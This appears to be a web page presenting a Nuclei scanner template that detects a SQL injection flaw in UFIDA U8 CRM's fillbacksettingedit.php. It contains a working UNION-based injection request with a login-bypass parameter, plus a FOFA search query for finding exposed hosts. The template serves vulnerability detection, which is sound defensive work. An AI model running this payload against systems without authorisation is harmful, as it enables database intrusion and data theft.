Skip to content

UFIDA U8 CRM cfillbacksetting.php - SQL Injection

ID: yonyou-u8-crm-sqli

Severity: high

Author: s4e-io

Tags: yonyou,u8-crm,sqli

UFIDA U8-CRM system /config/fillbacksetting.php contains an SQL injection vulnerability, which allows attackers to manipulate the database through maliciously constructed SQL statements, resulting in data leaks, tampering or destruction, and seriously threatening system security.

id: yonyou-u8-crm-sqli
info:
name: UFIDA U8 CRM cfillbacksetting.php - SQL Injection
author: s4e-io
severity: high
description: |
UFIDA U8-CRM system /config/fillbacksetting.php contains an SQL injection vulnerability, which allows attackers to manipulate the database through maliciously constructed SQL statements, resulting in data leaks, tampering or destruction, and seriously threatening system security.
reference:
- https://github.com/wy876/POC/blob/main/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8BU8-CRM%E7%B3%BB%E7%BB%9Ffillbacksetting.php%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
metadata:
verified: true
max-request: 1
fofa-query: title="用友U8CRM"
tags: yonyou,u8-crm,sqli
http:
- raw:
- |
GET /config/fillbacksettingedit.php?DontCheckLogin=1&action=edit&id=1+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,@@VERSION,NULL,NULL--+ HTTP/1.1
Host: {{Hostname}}
Cookie: PHPSESSID=bgsesstimeout-;
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "src_obj_type\":\"businesInfo\",\"src_fld"
- type: regex
part: body
negative: true
regex:
- "src_fld\":null"
- type: status
status:
- 200
# digest: 4b0a00483046022100add72ce81aadfb1f95e4364829098a44c274c59c80466b16eefdabf29ba7e365022100a3a51e5c96673a2d4241135d6be86ccf9b2e74239b0df463c098a09ca65db4d0:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/yonyou/yonyou-u8-crm-sqli.yaml"

View on Github